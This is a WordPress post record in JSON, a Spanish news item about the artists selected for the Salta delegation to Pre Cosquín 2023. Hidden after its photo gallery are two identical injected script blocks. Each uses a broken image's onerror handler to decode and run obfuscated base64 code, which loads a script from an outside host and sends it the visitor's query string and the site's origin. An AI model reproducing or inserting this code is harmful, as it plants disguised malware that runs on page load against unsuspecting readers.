{"id":1764,"date":"2022-11-09T10:33:52","date_gmt":"2022-11-09T13:33:52","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1764"},"modified":"2025-08-14T00:30:37","modified_gmt":"2025-08-14T03:30:37","slug":"la-delegacion-del-pre-cosquin-2023-sede-salta-ya-tiene-sus-artistas-seleccionados","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1764","title":{"rendered":"La Delegaci\u00f3n del Pre Cosqu\u00edn 2023 sede Salta\u00a0ya tiene sus artistas seleccionados"},"content":{"rendered":"\n<h4 class=\"has-text-color has-background wp-block-heading\" style=\"background-color:#540505;color:#8b7878\"><strong><em>Fueron elegidos este fin de semana en el Teatro Municipal por jurados especializados en danza y canto. El certamen de selecci\u00f3n llev\u00f3 22 horas. El festival se desarrollar\u00e1 del 3 al 18 de enero del 2023.<\/em><\/strong><\/h4>\n\n\n\n<p>La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, acompa\u00f1\u00f3 la selecci\u00f3n de los artistas que conforman la Delegaci\u00f3n de la Sede Salta del Pre Cosqu\u00edn 2023.<\/p>\n\n\n\n<p>En el Teatro Municipal, los artistas, previamente inscriptos, mostraron su arte ante los jurados en danza Alejandra \u00abVidala\u00bb Barboza, Juan Carlos Vilca y Jos\u00e9 Demelchiorre y los jurados en canto Miguel Villalba, Fabi\u00e1n Herrera y Juan Carlos Vargas. El veedor de la Comisi\u00f3n de Folklore de Cosqu\u00edn fue Gustavo Soler<\/p>\n\n\n\n<p>El pr\u00f3ximo a\u00f1o, en el que se celebran los 51 a\u00f1os del certamen m\u00e1s importante de nuevos valores del canto y de la danza de Latinoam\u00e9rica, la Delegaci\u00f3n de la Sede Salta al Pre Cosqu\u00edn 2023 que participar\u00e1 del 3 al 18 de enero 2023, estar\u00e1 formada por:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Solista Vocal:&nbsp;Mat\u00edas Vargas.&nbsp;Luciana Palavecino<\/li><li>D\u00fao Vocal:&nbsp;JoBen<\/li><li>Conjunto Vocal:&nbsp;La Repiqueteada<\/li><li>Tema In\u00e9dito:&nbsp;Por la tierra (Pablo Quijano)<\/li><li>Solista Instrumental:&nbsp;Oscar Erick Perotti Villagra (charanguista)<\/li><li>Solista de Malambo:&nbsp;Cristian Alvarado<\/li><li>Pareja de Baile Tradicional:&nbsp;Suarez \u2013 Gimenez<\/li><li>Pareja de Baile Estilizado:&nbsp;Zambrano-Zambrano<\/li><li>Conjunto de Malambo:&nbsp;Federaci\u00f3n Ballet<\/li><li>Conjunto de Baile Folkl\u00f3rico:&nbsp;Santiago Ayala<\/li><\/ul>\n\n\n\n<p>\u201cSe cumpli\u00f3 una vez m\u00e1s el objetivo de darle lugar a los nuevos valores del canto y de la danza hacia un m\u00edtico escenario del folklore latinoamericano como lo es el Atahualpa\u00a0Yupanqui. El agradecimiento a la Municipalidad de Salta por la posibilidad de utilizar el Teatro Municipal\u00a0para la cultura y a todo el equipo de colaboradores y coordinadores, sobre todo al personal t\u00e9cnico por\u00a0las 22 horas del certamen de selecci\u00f3n\u201d, expres\u00f3 Oscar Humacata desde organizaci\u00f3n del Pre Cosqu\u00edn\u00a0\u2013 Sede Salta.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"1765\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-1-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1765\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-1-1-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-1-1-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-1-1-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-1-1-1536x864.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-1-1-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-1-1-1068x601.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-1-1-747x420.jpg 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-1-1.jpg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"1767\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-3-1024x576.jpg\" alt=\"\" class=\"wp-image-1767\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-3-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-3-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-3-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-3-1536x864.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-3-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-3-1068x601.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-3-747x420.jpg 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-3.jpg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"1766\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-2-1024x576.jpg\" alt=\"\" class=\"wp-image-1766\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-2-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-2-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-2-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-2-1536x864.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-2-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-2-1068x601.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-2-747x420.jpg 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/artistas-pre-cosquin-2.jpg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Fueron elegidos este fin de semana en el Teatro Municipal por jurados especializados en danza y canto. El certamen de selecci\u00f3n llev\u00f3 22 horas. El festival se desarrollar\u00e1 del 3 al 18 de enero del 2023. La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, acompa\u00f1\u00f3 la selecci\u00f3n de los artistas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1767,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-1764","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1764"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1764"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1764\/revisions"}],"predecessor-version":[{"id":7281,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1764\/revisions\/7281"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1767"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1764"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1764"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1764"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}